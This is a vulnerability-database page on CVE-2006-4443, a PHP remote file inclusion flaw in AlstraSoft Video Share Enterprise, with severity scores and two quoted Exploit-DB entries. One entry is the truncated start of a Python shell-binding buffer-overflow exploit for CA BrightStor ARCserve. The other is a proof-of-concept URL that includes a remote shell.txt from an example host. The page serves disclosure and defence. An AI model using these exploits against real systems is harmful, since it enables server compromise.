CVE-2006-4443
published 2006-08-29CVE-2006-4443: PHP remote file inclusion vulnerability in myajaxphp.php in AlstraSoft Video Share Enterprise allows remote attackers to execute arbitrary PHP code via a URL…
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.48%
82.6th percentile
PHP remote file inclusion vulnerability in myajaxphp.php in AlstraSoft Video Share Enterprise allows remote attackers to execute arbitrary PHP code via a URL in the config[BASE_DIR] parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| alstrasoft | video_share_enterprise | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
CA BrightStor ARCserve - 'tapeeng.exe' Remote Buffer Overflow
exploitdb·2007-01-05
CVE-2006-6917 CA BrightStor ARCserve - 'tapeeng.exe' Remote Buffer Overflow
CA BrightStor ARCserve - 'tapeeng.exe' Remote Buffer Overflow
---
#!/usr/bin/python
# Remote exploit for buffer overflow vulnerability in CA BrightStor Arcserve
# tapeeng.exe service. Tested on windows 2000 SP4. Binds shell to TCP port 4443
#
# Winny M Thomas ;-)
# Author shall bear no responsibility for any screw ups caused by using this code
from impacket.dcerpc import transport, dcerpc
from impacket import uuid
import sys
def EnableDetailLogging(target):
trans = transport.TCPTransport(target, 6502)
#On some linux systems the following call to connect may fail due to
#no support of settimeout in socket module. Comment out that line in
#transport.py of impacket and run this script
try:
trans.connect()
except:
print 'Could not connect to target port; Target may not be running tapeeng
Exploit-DB
Alstrasoft Video Share Enterprise 4.x - 'MyajaxPHP.php' Remote File Inclusion
exploitdb·2006-08-26
CVE-2006-4443 Alstrasoft Video Share Enterprise 4.x - 'MyajaxPHP.php' Remote File Inclusion
Alstrasoft Video Share Enterprise 4.x - 'MyajaxPHP.php' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/19724/info
AlstraSoft Video Share Enterprise is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Video Share Enterprise versions prior to 4.4 are vulnerable.
http://www.example.com/[Script Path]/ajax/myajaxphp.php?config[BASE_DIR]=http://www.example.com/shell.txt?
No writeups or analysis indexed.
http://securityreason.com/securityalert/1467http://www.securityfocus.com/archive/1/444416/100/0/threadedhttp://www.securityfocus.com/bid/19724https://exchange.xforce.ibmcloud.com/vulnerabilities/28583http://securityreason.com/securityalert/1467http://www.securityfocus.com/archive/1/444416/100/0/threadedhttp://www.securityfocus.com/bid/19724https://exchange.xforce.ibmcloud.com/vulnerabilities/28583
2006-08-29
Published